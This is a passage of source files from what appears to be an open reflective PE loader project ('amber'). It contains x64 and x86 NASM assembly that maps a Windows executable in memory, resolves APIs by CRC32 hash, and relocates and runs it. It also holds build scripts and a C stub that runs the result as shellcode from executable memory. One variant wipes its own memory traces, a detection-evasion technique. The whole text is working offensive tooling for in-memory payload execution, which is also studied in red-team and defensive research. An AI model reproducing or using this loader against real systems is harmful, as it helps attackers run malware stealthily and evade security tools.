16 | echo -e ${RED}"[!] $1\n${RESET}"
17 | kill -10 $$
18 | }
19 | print_good() {
20 | echo "${GREEN}[+] ${RESET}${1}"
21 | }
22 | print_status() {
23 | echo "${YELLOW}[*] ${RESET}${1}"
24 | }
25 |
26 | nasm -f bin loader-x64.asm -o shellcode || print_fatal "nasm failed!"
27 | print_status "Payload Size: `wc -c shellcode|cut -d' ' -f1`"
28 | [[ -f shellcode ]] && xxd -i shellcode shellcode.h
29 |
30 | x86_64-w64-mingw32-gcc stub.c -o test.exe || print_fatal "Compilation failed!"
31 | cp test.exe /tmp/
32 | rm shellcode shellcode.h
33 | print_good "Build done!"
34 |
--------------------------------------------------------------------------------
/loader/loader-x64/inc/calc_crc.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | calc_crc:
5 | test dx,dx
6 | je loc_1400039c9
7 | mov r8,rcx
8 | movzx edx,dx
9 | lea eax,[rdx-0x1]
10 | lea rdx,[rcx+rax*1+0x1]
11 | mov eax,0x0
12 | loc_1400039b8:
13 | crc32 eax,BYTE [r8]
14 | add r8,0x1
15 | cmp r8,rdx
16 | jne loc_1400039b8
17 | jmp loc_1400039ea
18 | loc_1400039c9:
19 | movzx edx,BYTE [rcx]
20 | test dl,dl
21 | je loc_1400039eb
22 | add rcx,0x1
23 | mov eax,0x0
24 | loc_1400039d9:
25 | crc32 eax,dl
26 | add rcx,0x1
27 | movzx edx,BYTE [rcx-0x1]
28 | test dl,dl
29 | jne loc_1400039d9
30 | loc_1400039ea:
31 | ret
32 | loc_1400039eb:
33 | mov eax,0x0
34 | jmp loc_1400039ea
--------------------------------------------------------------------------------
/loader/loader-x64/inc/get_module_by_crc.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | get_module_by_crc:
5 | push rdi
6 | push rsi
7 | push rbx
8 | sub rsp,0x20
9 | mov esi,ecx
10 | mov rax,QWORD gs:0x60
11 | mov rax,QWORD [rax+0x18]
12 | lea rdi,[rax+0x20]
13 | mov rbx,QWORD [rax+0x20]
14 | cmp rdi,rbx
15 | je loc_140102e89
16 | loc_140102e5d:
17 | movzx edx,WORD [rbx+0x48]
18 | mov rcx,QWORD [rbx+0x50]
19 | call calc_crc
20 | cmp eax,esi
21 | je loc_140102e7d
22 | mov rbx,QWORD [rbx]
23 | cmp rdi,rbx
24 | jne loc_140102e5d
25 | mov eax,0x0
26 | jmp loc_140102e81
27 | loc_140102e7d:
28 | mov rax,QWORD [rbx+0x20]
29 | loc_140102e81:
30 | add rsp,0x20
31 | pop rbx
32 | pop rsi
33 | pop rdi
34 | ret
35 | loc_140102e89:
36 | mov eax,0x0
37 | jmp loc_140102e81
38 |
--------------------------------------------------------------------------------
/loader/loader-x64/inc/get_proc_by_crc.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | get_proc_by_crc:
5 | push r15
6 | push r14
7 | push r13
8 | push r12
9 | push rbp
10 | push rdi
11 | push rsi
12 | push rbx
13 | sub rsp,0x258
14 | mov rbx,rcx
15 | mov r13d,edx
16 | mov ebp,r8d
17 | movsxd rax,DWORD [rcx+0x3c]
18 | add rax,rcx
19 | mov esi,DWORD [rax+0x88]
20 | add rsi,rcx
21 | mov eax,DWORD [rax+0x8c]
22 | mov DWORD [rsp+0x2c],eax
23 | mov r12d,DWORD [rsi+0x20]
24 | mov r14d,DWORD [rsi+0x1c]
25 | mov r15d,DWORD [rsi+0x24]
26 | mov eax,DWORD [rsi+0x18]
27 | test eax,eax
28 | je loc_140003764
29 | mov eax,eax
30 | mov QWORD [rsp+0x20],rax
31 | mov edi,0x0
32 | add r12,rcx
33 | loc_1400035dc:
34 | mov ecx,DWORD [r12+rdi*4]
35 | add rcx,rbx
36 | mov edx,0x0
37 | call calc_crc
38 | cmp ebp,edi
39 | je loc_14000360b
40 | cmp eax,r13d
41 | je loc_14000360b
42 | add rdi,0x1
43 | cmp QWORD [rsp+0x20],rdi
44 | jne loc_1400035dc
45 | mov eax,0x0
46 | jmp loc_140003738
47 | loc_14000360b:
48 | lea rax,[rbx+rdi*2]
49 | movzx eax,WORD [rax+r15*1]
50 | lea rax,[rbx+rax*4]
51 | mov eax,DWORD [rax+r14*1]
52 | add rbx,rax
53 | cmp rbx,rsi
54 | jb loc_140003735
55 | mov eax,DWORD [rsp+0x2c]
56 | add rsi,rax
57 | cmp rbx,rsi
58 | jae loc_140003735
59 | mov QWORD [rsp+0x30],0x0
60 | mov QWORD [rsp+0x38],0x0
61 | lea rdi,[rsp+0x40]
62 | mov eax,0x0
63 | mov ecx,0x1e
64 | rep stosq
65 | mov DWORD [rdi],0x0
66 | mov QWORD [rsp+0x140],0x0
67 | mov QWORD [rsp+0x148],0x0
68 | lea rdi,[rsp+0x150]
69 | mov ecx,0x1e
70 | rep stosq
71 | mov DWORD [rdi],0x0
72 | cmp BYTE [rbx],0x2e
73 | je loc_14000374c
74 | mov eax,0x1
75 | loc_14000369e:
76 | mov r8,rax
77 | add rax,0x1
78 | cmp BYTE [rbx+rax*1-0x1],0x2e
79 | jne loc_14000369e
80 | mov esi,r8d
81 | loc_1400036af:
82 | lea rcx,[rsp+0x30]
83 | mov rdx,rbx
84 | call memcpy
85 | lea ecx,[rsi+0x1]
86 | movsxd rcx,ecx
87 | add rcx,rbx
88 | cmp BYTE [rcx],0x0
89 | je loc_14000375c
90 | mov eax,0x1
91 | movsxd rdx,esi
92 | add rdx,rbx
93 | loc_1400036d9:
94 | mov r8,rax
95 | add rax,0x1
96 | cmp BYTE [rdx+rax*1],0x0
97 | jne loc_1400036d9
98 | loc_1400036e6:
99 | lea rax,[rsp+0x140]
100 | mov rdx,rcx
101 | mov rcx,rax
102 | call memcpy
103 | lea rcx,[rsp+0x30]
104 | call load_module
105 | mov rbx,rax
106 | mov eax,0x0
107 | test rbx,rbx
108 | je loc_140003738
109 | lea rcx,[rsp+0x140]
110 | mov edx,0x0
111 | call calc_crc
112 | mov edx,eax
113 | mov r8d,0xffffffff
114 | mov rcx,rbx
115 | call get_proc_by_crc
116 | mov rbx,rax
117 | loc_140003735:
118 | mov rax,rbx
119 | loc_140003738:
120 | add rsp,0x258
121 | pop rbx
122 | pop rsi
123 | pop rdi
124 | pop rbp
125 | pop r12
126 | pop r13
127 | pop r14
128 | pop r15
129 | ret
130 | loc_14000374c:
131 | mov esi,0x0
132 | mov r8d,0x0
133 | jmp loc_1400036af
134 | loc_14000375c:
135 | mov r8d,0x0
136 | jmp loc_1400036e6
137 | loc_140003764:
138 | mov eax,0x0
139 | jmp loc_140003738
--------------------------------------------------------------------------------
/loader/loader-x64/inc/load_module.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | load_module:
5 | push rdi
6 | sub rsp,0x250
7 | mov r8,rcx
8 | mov QWORD [rsp+0x248],0x0
9 | mov DWORD [rsp+0x234],0x0
10 | lea rdi,[rsp+0x20]
11 | mov ecx,0x41
12 | mov eax,0x0
13 | rep stosq
14 | cmp BYTE [r8],0x0
15 | je loc_140003873
16 | mov edx,0x1
17 | loc_1400037eb:
18 | mov rax,rdx
19 | add rdx,0x1
20 | cmp BYTE [r8+rdx*1-0x1],0x0
21 | jne loc_1400037eb
22 | lea edx,[rax+rax*1]
23 | mov WORD [rsp+0x230],dx
24 | add edx,0x2
25 | mov WORD [rsp+0x232],dx
26 | lea rdx,[rsp+0x20]
27 | mov QWORD [rsp+0x238],rdx
28 | sub eax,0x1
29 | js loc_140003837
30 | cdqe
31 | loc_140003824:
32 | movsx dx,BYTE [r8+rax*1]
33 | mov WORD [rsp+rax*2+0x20],dx
34 | sub rax,0x1
35 | test eax,eax
36 | jns loc_140003824
37 | loc_140003837:
38 | lea r9,[rsp+0x248]
39 | lea r8,[rsp+0x230]
40 | mov edx,0x0
41 | mov ecx,0x0
42 | mov r10, 0xB4EBB9A4
43 | call api_call
44 | call rax ;
45 | test eax,eax
46 | js loc_14000386c
47 | mov rax,QWORD [rsp+0x248]
48 | loc_140003863:
49 | add rsp,0x250
50 | pop rdi
51 | ret
52 | loc_14000386c:
53 | mov eax,0x0
54 | jmp loc_140003863
55 | loc_140003873:
56 | mov WORD [rsp+0x230],0x0
57 | mov WORD [rsp+0x232],0x2
58 | lea rax,[rsp+0x20]
59 | mov QWORD [rsp+0x238],rax
60 | jmp loc_140003837
--------------------------------------------------------------------------------
/loader/loader-x64/inc/map_image.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | map_image:
5 | push rbp
6 | push rdi
7 | push rsi
8 | push rbx
9 | sub rsp,0x48
10 | mov rbp,rcx
11 | movsxd rdi,DWORD [rcx+0x3c]
12 | add rdi,rcx
13 | mov eax,0x0
14 | cmp DWORD [rdi],0x4550
15 | jne loc_1400020b8
16 | mov QWORD [rsp+0x38],0x0
17 | mov eax,DWORD [rdi+0x50]
18 | mov QWORD [rsp+0x30],rax
19 | lea rdx,[rsp+0x38]
20 | mov DWORD [rsp+0x28],0x4
21 | mov DWORD [rsp+0x20],0x103000
22 | lea r9,[rsp+0x30]
23 | mov r8d,0x0
24 | mov rcx,0xffffffffffffffff
25 | mov r10, 0x99CE7C55
26 | call api_call
27 | call rax ;
28 | mov edx,eax
29 | mov eax,0x0
30 | test edx,edx
31 | js loc_1400020b8
32 | mov r8d,DWORD [rdi+0x54]
33 | mov rdx,rbp
34 | mov rcx,QWORD [rsp+0x38]
35 | call memcpy
36 | movzx eax,WORD [rdi+0x14]
37 | lea rbx,[rdi+rax*1+0x18]
38 | cmp WORD [rdi+0x6],0x0
39 | je loc_1400020b3
40 | mov esi,0x0
41 | loc_14000208d:
42 | mov ecx,DWORD [rbx+0xc]
43 | add rcx,QWORD [rsp+0x38]
44 | mov edx,DWORD [rbx+0x14]
45 | add rdx,rbp
46 | mov r8d,DWORD [rbx+0x10]
47 | call memcpy
48 | add esi,0x1
49 | add rbx,0x28
50 | movzx eax,WORD [rdi+0x6]
51 | cmp eax,esi
52 | jg loc_14000208d
53 | loc_1400020b3:
54 | mov rax,QWORD [rsp+0x38]
55 | loc_1400020b8:
56 | add rsp,0x48
57 | pop rbx
58 | pop rsi
59 | pop rdi
60 | pop rbp
61 | ret
--------------------------------------------------------------------------------
/loader/loader-x64/inc/memcpy.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 | ; memcpy(&dst, &src, size)
4 | ; RCX = &dst
5 | ; RDX = &src
6 | ; R8 = size
7 | memcpy:
8 | push rsi
9 | push rdi
10 | mov rdi,rcx
11 | mov rsi,rdx
12 | mov rcx,r8
13 | copy_byte:
14 | rep movsb ; Copy the CX number of bytes from RSI to RDI
15 | pop rdi ; Restore RDI
16 | pop rsi ; Restore RSI
17 | ret ; Return
--------------------------------------------------------------------------------
/loader/loader-x64/inc/protect_sections.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | protect_sections:
5 | push r14
6 | push r13
7 | push r12
8 | push rbp
9 | push rdi
10 | push rsi
11 | push rbx
12 | sub rsp,0x50
13 | mov rbp,rcx
14 | movsxd rdi,DWORD [rcx+0x3c]
15 | add rdi,rcx
16 | movzx eax,WORD [rdi+0x14]
17 | lea rbx,[rdi+rax*1+0x18]
18 | mov QWORD [rsp+0x48],0x0
19 | cmp WORD [rdi+0x6],0x0
20 | je loc_140002e87
21 | mov esi,0x0
22 | mov r12d,0x0
23 | lea r14,[rsp+0x40]
24 | lea r13,[rsp+0x48]
25 | jmp loc_140002f50
26 | loc_140002e38:
27 | mov ecx,0x1
28 | loc_140002e3d:
29 | and eax,0x60000000
30 | mov r8d,0x1
31 | cmp eax,0x60000000
32 | mov r9d,0x20
33 | mov eax,0x80
34 | cmovne r9d,eax
35 | jmp loc_140002eed
36 | loc_140002e61:
37 | mov r9d,0x20
38 | jmp loc_140002efd
39 | loc_140002e6c:
40 | mov eax,0x0
41 | jmp loc_140002e78
42 | loc_140002e73:
43 | mov eax,0x1
44 | loc_140002e78:
45 | add rsp,0x50
46 | pop rbx
47 | pop rsi
48 | pop rdi
49 | pop rbp
50 | pop r12
51 | pop r13
52 | pop r14
53 | ret
54 | loc_140002e87:
55 | mov eax,0x1
56 | jmp loc_140002e78
57 | loc_140002e8e:
58 | mov ecx,0x1
59 | mov r8d,r12d
60 | mov r9d,0x10
61 | jmp loc_140002edd
62 | loc_140002e9e:
63 | mov ecx,r12d
64 | test eax,0x20000000
65 | je loc_140002eda
66 | mov ecx,0x0
67 | test eax,eax
68 | js loc_140002e3d
69 | mov ecx,eax
70 | shr ecx,0x1f
71 | mov r8d,ecx
72 | mov ecx,r12d
73 | mov r9d,0x10
74 | jmp loc_140002edd
75 | loc_140002ec4:
76 | test eax,0x20000000
77 | jne loc_140002e38
78 | mov ecx,0x1
79 | mov r9d,0x4
80 | loc_140002eda:
81 | mov r8d,r12d
82 | loc_140002edd:
83 | and eax,0x60000000
84 | cmp eax,0x60000000
85 | je loc_140002e61
86 | loc_140002eed:
87 | test cl,cl
88 | je loc_140002efd
89 | test r8b,r8b
90 | mov eax,0x40
91 | cmovne r9d,eax
92 | loc_140002efd:
93 | mov eax,DWORD [rdx+0xc]
94 | add rax,rbp
95 | mov QWORD [rsp+0x48],rax
96 | mov eax,DWORD [rdx+0x10]
97 | mov QWORD [rsp+0x40],rax
98 | mov DWORD [rsp+0x3c],0x0
99 | lea rax,[rsp+0x3c]
100 | mov QWORD [rsp+0x20],rax
101 | mov r8,r14
102 | mov rdx,r13
103 | mov rcx,0xffffffffffffffff
104 | mov r10, 0x6EDE4D41
105 | call api_call
106 | call rax ;
107 | test eax,eax
108 | js loc_140002e6c
109 | loc_140002f3d:
110 | add esi,0x1
111 | add rbx,0x28
112 | movzx eax,WORD [rdi+0x6]
113 | cmp eax,esi
114 | jle loc_140002e73
115 | loc_140002f50:
116 | mov rdx,rbx
117 | mov eax,DWORD [rbx+0x24]
118 | test eax,eax
119 | je loc_140002f3d
120 | mov r9d,eax
121 | sar r9d,0x1f
122 | and r9d,0xffffffc8
123 | add r9d,0x40
124 | test eax,0x40000000
125 | je loc_140002e9e
126 | test eax,eax
127 | js loc_140002ec4
128 | test eax,0x20000000
129 | jne loc_140002e8e
130 | mov ecx,0x1
131 | mov r9d,0x2
132 | jmp loc_140002eda
--------------------------------------------------------------------------------
/loader/loader-x64/inc/relocate_image.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | relocate_image:
5 | mov r9,rcx
6 | movsxd rdx,DWORD [rcx+0x3c]
7 | add rdx,rcx
8 | mov eax,DWORD [rdx+0xb0]
9 | mov ecx,0x0
10 | test eax,eax
11 | je loc_14000261a
12 | mov eax,eax
13 | lea rcx,[r9+rax*1]
14 | mov r10,r9
15 | sub r10,QWORD [rdx+0x30]
16 | cmp DWORD [rcx],0x0
17 | jne loc_140002601
18 | mov ecx,0x1
19 | jmp loc_14000261a
20 | loc_1400025bd:
21 | mov edx,DWORD [rcx]
22 | movzx r8d,WORD [rax]
23 | and r8d,0xfff
24 | add rdx,r8
25 | add QWORD [r9+rdx*1],r10
26 | loc_1400025d1:
27 | add rax,0x2
28 | mov edx,DWORD [rcx+0x4]
29 | add rdx,rcx
30 | cmp rax,rdx
31 | je loc_1400025f9
32 | loc_1400025e0:
33 | movzx edx,BYTE [rax+0x1]
34 | mov r8d,edx
35 | and r8d,0xfffffff0
36 | cmp r8b,0xa0
37 | je loc_1400025bd
38 | cmp dl,0xf
39 | jbe loc_1400025d1
40 | jmp loc_1400025d1
41 | loc_1400025f9:
42 | mov rcx,rax
43 | loc_1400025fc:
44 | cmp DWORD [rcx],0x0
45 | je loc_140002615
46 | loc_140002601:
47 | lea rax,[rcx+0x8]
48 | mov edx,DWORD [rcx+0x4]
49 | add rdx,rcx
50 | cmp rax,rdx
51 | jne loc_1400025e0
52 | mov rcx,rdx
53 | jmp loc_1400025fc
54 | loc_140002615:
55 | mov ecx,0x1
56 | loc_14000261a:
57 | mov eax,ecx
58 | ret
--------------------------------------------------------------------------------
/loader/loader-x64/inc/resolve_imports.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | resolve_imports:
5 | push r12
6 | push rbp
7 | push rdi
8 | push rsi
9 | push rbx
10 | sub rsp,0x20
11 | mov rbp,rcx
12 | movsxd rax,DWORD [rcx+0x3c]
13 | mov eax,DWORD [rcx+rax*1+0x90]
14 | mov edx,0x0
15 | test eax,eax
16 | je loc_140002966
17 | mov eax,eax
18 | lea r12,[rcx+rax*1]
19 | mov ecx,DWORD [r12+0xc]
20 | test ecx,ecx
21 | jne loc_14000292f
22 | mov edx,0x1
23 | jmp loc_140002966
24 | loc_1400028cf:
25 | mov edx,0x0
26 | mov rcx,rdi
27 | call get_proc_by_crc
28 | test rax,rax
29 | je loc_1400028e4
30 | mov QWORD [rsi],rax
31 | loc_1400028e4:
32 | add rbx,0x8
33 | add rsi,0x8
34 | mov r8,QWORD [rbx]
35 | test r8,r8
36 | je loc_140002922
37 | loc_1400028f4:
38 | test r8,r8
39 | js loc_1400028cf
40 | lea rcx,[rbp+r8*1+0x2]
41 | mov edx,0x0
42 | call calc_crc
43 | mov edx,eax
44 | mov r8d,0xffffffff
45 | mov rcx,rdi
46 | call get_proc_by_crc
47 | test rax,rax
48 | je loc_1400028e4
49 | mov QWORD [rsi],rax
50 | loc_140002920:
51 | jmp loc_1400028e4
52 | loc_140002922:
53 | add r12,0x14
54 | mov ecx,DWORD [r12+0xc]
55 | test ecx,ecx
56 | je loc_14000295a
57 | loc_14000292f:
58 | mov ecx,ecx
59 | add rcx,rbp
60 | call load_module
61 | mov rdi,rax
62 | test rax,rax
63 | je loc_140002961
64 | mov ebx,DWORD [r12]
65 | add rbx,rbp
66 | mov esi,DWORD [r12+0x10]
67 | add rsi,rbp
68 | mov r8,QWORD [rbx]
69 | test r8,r8
70 | jne loc_1400028f4
71 | jmp loc_140002922
72 | loc_14000295a:
73 | mov edx,0x1
74 | jmp loc_140002966
75 | loc_140002961:
76 | mov edx,0x0
77 | loc_140002966:
78 | mov eax,edx
79 | add rsp,0x20
80 | pop rbx
81 | pop rsi
82 | pop rdi
83 | pop rbp
84 | pop r12
85 | ret
--------------------------------------------------------------------------------
/loader/loader-x64/inc/run_tls_callbacks.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | run_tls_callbacks:
5 | push rsi
6 | push rbx
7 | sub rsp,0x28
8 | mov rsi,rcx
9 | movsxd rax,DWORD [rcx+0x3c]
10 | mov eax,DWORD [rcx+rax*1+0xd0]
11 | mov edx,0x0
12 | test eax,eax
13 | je loc_1400033ad
14 | mov eax,eax
15 | mov rbx,QWORD [rcx+rax*1+0x18]
16 | mov edx,0x1
17 | test rbx,rbx
18 | jne loc_1400033ca
19 | loc_1400033ad:
20 | mov eax,edx
21 | add rsp,0x28
22 | pop rbx
23 | pop rsi
24 | ret
25 | loc_1400033b6:
26 | mov r8d,0x0
27 | mov edx,0x1
28 | mov rcx,rsi
29 | call rax
30 | add rbx,0x8
31 | loc_1400033ca:
32 | mov rax,QWORD [rbx]
33 | test rax,rax
34 | jne loc_1400033b6
35 | mov edx,0x1
36 | jmp loc_1400033ad
--------------------------------------------------------------------------------
/loader/loader-x64/loader-x64-lite.asm:
--------------------------------------------------------------------------------
1 | ;#==============================================#
2 | ;# X64 Reflective Loader #
3 | ;# Author: Ege Balcı #
4 | ;# Version: 3.0 #
5 | ;#==============================================#
6 | ;
7 | [BITS 64]
8 |
9 | %define e_lfanew 0x3C
10 | %define _AddressOfEntry 0x28
11 | loader_size equ pe_start-loader
12 |
13 |
14 | call loader ; Get the address of PE image to stack
15 | loader:
16 | pop rsi ; Get current address to RSI
17 | add rsi, loader_size ; Add the total loader size
18 | push rbp ; Save RBP
19 | mov rbp,rsp ; Create a stack frame
20 | mov rcx,rsi ; Move the image address as first parameter
21 | call map_image ; Perform PE image mapping
22 | mov rdi, rax ; Get the address of mapped PE image into RDI
23 | mov rcx, rdi ; Move a copy of the mapped image address into RCX as first parameter
24 | call resolve_imports ; Resolve image imports
25 | mov rcx, rdi ; Set the mapped image address as first parameter
26 | call relocate_image ; Perform image base relocation
27 | mov rcx, rdi ; Set the mapped image address as first parameter
28 | call protect_sections ; Apply proper section memory protections
29 | mov rcx, rdi ; Set the mapped image address as first parameter
30 | call run_tls_callbacks ; Try to execute TLS callbacks. May fail... ¯\_(ツ)_/¯
31 | xor rax, rax ; Clear out RAX
32 | mov eax, DWORD [rdi+e_lfanew] ; Get the file header offset
33 | mov eax, DWORD [rdi+rax+_AddressOfEntry] ; Get the AddressOfEntry into EAX
34 | add rax,rdi ; Add the AOE onto new image base
35 | cld ; Clear direction flags
36 | mov rsp, rbp ; Restore stack frame
37 | pop rbp ; Restore RBP
38 | jmp rax ; Jmp to the PE->AOE
39 | ; ------------------------ FUNCTIONS ------------------------------------
40 | %include "./inc/memcpy.asm"
41 | %include "./inc/calc_crc.asm"
42 | %include "./inc/map_image.asm"
43 | %include "./inc/load_module.asm"
44 | %include "./inc/relocate_image.asm"
45 | %include "./inc/resolve_imports.asm"
46 | %include "./inc/get_proc_by_crc.asm"
47 | %include "./inc/get_module_by_crc.asm"
48 | %include "./inc/protect_sections.asm"
49 | %include "./inc/run_tls_callbacks.asm"
50 | %include "../crc32_api/crc32_api_x64.asm"
51 | ;------------------------ FUNCTIONS -------------------------------------
52 | pe_start:
--------------------------------------------------------------------------------
/loader/loader-x64/loader-x64.asm:
--------------------------------------------------------------------------------
1 | ;#==============================================#
2 | ;# X64 Reflective Loader #
3 | ;# Author: Ege Balcı #
4 | ;# Version: 3.0 #
5 | ;#==============================================#
6 | ;
7 | [BITS 64]
8 |
9 | %define e_lfanew 0x3C
10 | %define _AddressOfEntry 0x28
11 |
12 | call start ; Get the address of PE image to stack
13 | incbin "putty.exe" ; PE file.
14 | start:
15 | pop rsi ; Get the address of PE to RSI
16 | push rbp ; Save RBP
17 | mov rbp,rsp ; Create a stack frame
18 | mov rcx,rsi ; Move the image address as first parameter
19 | call map_image ; Perform PE image mapping
20 | mov rdi, rax ; Get the address of mapped PE image into RDI
21 | mov rcx, rdi ; Move a copy of the mapped image address into RCX as first parameter
22 | call resolve_imports ; Resolve image imports
23 | mov rcx, rdi ; Set the mapped image address as first parameter
24 | call relocate_image ; Perform image base relocation
25 | mov rcx, rdi ; Set the mapped image address as first parameter
26 | call protect_sections ; Apply proper section memory protections
27 | mov rcx, rdi ; Set the mapped image address as first parameter
28 | call run_tls_callbacks ; Try to execute TLS callbacks. May fail... ¯\_(ツ)_/¯
29 | xor rax, rax ; Clear out RAX
30 | mov eax, DWORD [rdi+e_lfanew] ; Get the file header offset
31 | mov eax, DWORD [rdi+rax+_AddressOfEntry] ; Get the AddressOfEntry into EAX
32 | add rax,rdi ; Add the AOE onto new image base
33 | jmp wipe ; Start wiping memory artifacts...
34 | ; ------------------------ FUNCTIONS ------------------------------------
35 | %include "./inc/memcpy.asm"
36 | %include "./inc/calc_crc.asm"
37 | %include "./inc/map_image.asm"
38 | %include "./inc/load_module.asm"
39 | %include "./inc/relocate_image.asm"
40 | %include "./inc/resolve_imports.asm"
41 | %include "./inc/get_proc_by_crc.asm"
42 | %include "./inc/get_module_by_crc.asm"
43 | %include "./inc/protect_sections.asm"
44 | %include "./inc/run_tls_callbacks.asm"
45 | %include "../crc32_api/crc32_api_x64.asm"
46 | ;------------------------ FUNCTIONS -------------------------------------
47 | wipe:
48 | wipe_len_delta equ wipe_end-wipe
49 | call $+5 ; Get current EIP to stack
50 | pop rcx ; Pop currect EIP to RCX
51 | sub rcx,rsi ; Calculate the size of the PE file
52 | add rcx,wipe_len_delta ; Add the size of wipe code
53 | mov rdi,rsi ; Move the PE address to RDI
54 | sub rdi,0x5 ; Go back 5 bytes for wiping the initial call as well
55 | wipe_end:
56 | rep stosb ; Store AL into RDI and decrement RDI until RCX = 0
57 | ; -------------------- SWITCH TO PE ----------------------------
58 | cld ; Clear direction flags
59 | mov rsp, rbp ; Restore stack frame
60 | pop rbp ; Restore RBP
61 | jmp rax ; Jmp to the PE->AOE
--------------------------------------------------------------------------------
/loader/loader-x64/stub.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include "shellcode.h"
3 |
4 | int main(int argc, char const *argv[])
5 | {
6 | char* BUFFER = (char*)VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
7 | memcpy(BUFFER, shellcode, sizeof(shellcode));
8 | (*(void(*)())BUFFER)();
9 | return 0;
10 | }
11 |
--------------------------------------------------------------------------------
/loader/loader-x86/amber_loader-x86-lite.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/EgeBalci/amber/f6eb2dc4b4b1a408d23ad376b16ac0c9a7b4c54d/loader/loader-x86/amber_loader-x86-lite.bin
--------------------------------------------------------------------------------
/loader/loader-x86/build.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | ## ANSI Colors (FG & BG)
3 | RED="$(printf '\033[31m')" GREEN="$(printf '\033[32m')" YELLOW="$(printf '\033[33m')" BLUE="$(printf '\033[34m')"
4 | MAGENTA="$(printf '\033[35m')" CYAN="$(printf '\033[36m')" WHITE="$(printf '\033[37m')" BLACK="$(printf '\033[30m')"
5 | REDBG="$(printf '\033[41m')" GREENBG="$(printf '\033[42m')" YELLOWBG="$(printf '\033[43m')" BLUEBG="$(printf '\033[44m')"
6 | MAGENTABG="$(printf '\033[45m')" CYANBG="$(printf '\033[46m')" WHITEBG="$(printf '\033[47m')" BLACKBG="$(printf '\033[40m')"
7 | RESET="$(printf '\e[0m')"
8 |
9 | print_warning() {
10 | echo ${YELLOW}"[!] ${RESET}${1}"
11 | }
12 | print_error() {
13 | echo "${RED}[-] ${RESET}${1}"
14 | }
15 | print_fatal() {
16 | echo -e ${RED}"[!] $1\n${RESET}"
17 | kill -10 $$
18 | }
19 | print_good() {
20 | echo "${GREEN}[+] ${RESET}${1}"
21 | }
22 | print_status() {
23 | echo "${YELLOW}[*] ${RESET}${1}"
24 | }
25 |
26 | nasm -f bin loader-x86.asm -o shellcode || print_fatal "nasm failed!"
27 | print_status "Payload Size: `wc -c shellcode|cut -d' ' -f1`"
28 | [[ -f shellcode ]] && xxd -i shellcode shellcode.h
29 |
30 | i686-w64-mingw32-gcc stub.c -o test.exe || print_fatal "Compilation failed!"
31 | cp test.exe /tmp/
32 | rm shellcode shellcode.h
33 | print_good "Build done!"
34 |
--------------------------------------------------------------------------------
/loader/loader-x86/inc/calc_crc.asm:
--------------------------------------------------------------------------------
1 | [BITS 32]
2 |
3 |
4 | calc_crc:
5 | loc_40b22f: mov eax,DWORD [esp+0x4]
6 | loc_40b233: mov edx,DWORD [esp+0x8]
7 | loc_40b237: test dx,dx
8 | loc_40b23a: je loc_40b256
9 | loc_40b23c: mov ecx,eax
10 | loc_40b23e: movzx edx,dx
11 | loc_40b241: add eax,edx
12 | loc_40b243: mov edx,0x0
13 | loc_40b248: crc32 edx,BYTE [ecx]
14 | loc_40b24d: add ecx,0x1
15 | loc_40b250: cmp ecx,eax
16 | loc_40b252: jne loc_40b248
17 | loc_40b254: jmp loc_40b275
18 | loc_40b256: movzx ecx,BYTE [eax]
19 | loc_40b259: test cl,cl
20 | loc_40b25b: je loc_40b278
21 | loc_40b25d: add eax,0x1
22 | loc_40b260: mov edx,0x0
23 | loc_40b265: crc32 edx,cl
24 | loc_40b26a: add eax,0x1
25 | loc_40b26d: movzx ecx,BYTE [eax-0x1]
26 | loc_40b271: test cl,cl
27 | loc_40b273: jne loc_40b265
28 | loc_40b275: mov eax,edx
29 | loc_40b277: ret
30 | loc_40b278: mov edx,0x0
31 | loc_40b27d: jmp loc_40b275
32 |
--------------------------------------------------------------------------------
/loader/loader-x86/inc/get_module_by_crc.asm:
--------------------------------------------------------------------------------
1 | [BITS 32]
2 |
3 |
4 | get_module_by_crc:
5 | loc_4077e7: push edi
6 | loc_4077e8: push esi
7 | loc_4077e9: push ebx
8 | loc_4077ea: sub esp,0x8
9 | loc_4077ed: mov edi,DWORD [esp+0x18]
10 | loc_4077f1: mov eax,fs:0x30
11 | loc_4077f7: mov eax,DWORD [eax+0xc]
12 | loc_4077fa: lea esi,[eax+0x14]
13 | loc_4077fd: mov ebx,DWORD [eax+0x14]
14 | loc_407800: cmp esi,ebx
15 | loc_407802: je loc_407832
16 | loc_407804: movzx eax,WORD [ebx+0x24]
17 | loc_407808: mov DWORD [esp+0x4],eax
18 | loc_40780c: mov eax,DWORD [ebx+0x28]
19 | loc_40780f: mov DWORD [esp],eax
20 | loc_407812: call calc_crc
21 | loc_407817: cmp eax,edi
22 | loc_407819: je loc_407828
23 | loc_40781b: mov ebx,DWORD [ebx]
24 | loc_40781d: cmp esi,ebx
25 | loc_40781f: jne loc_407804
26 | loc_407821: mov eax,0x0
27 | loc_407826: jmp loc_40782b
28 | loc_407828: mov eax,DWORD [ebx+0x10]
29 | loc_40782b: add esp,0x8
30 | loc_40782e: pop ebx
31 | loc_40782f: pop esi
32 | loc_407830: pop edi
33 | loc_407831: ret
34 | loc_407832: mov eax,0x0
35 | loc_407837: jmp loc_40782b
36 |
--------------------------------------------------------------------------------
/loader/loader-x86/inc/get_proc_by_crc.asm:
--------------------------------------------------------------------------------
1 | [BITS 32]
2 |
3 |
4 | get_proc_by_crc:
5 | loc_408e97: push ebp
6 | loc_408e98: mov ebp,esp
7 | loc_408e9a: push edi
8 | loc_408e9b: push esi
9 | loc_408e9c: push ebx
10 | loc_408e9d: and esp,0xfffffff0
11 | loc_408ea0: sub esp,0x240
12 | loc_408ea6: mov ebx,DWORD [ebp+0x8]
13 | loc_408ea9: mov eax,ebx
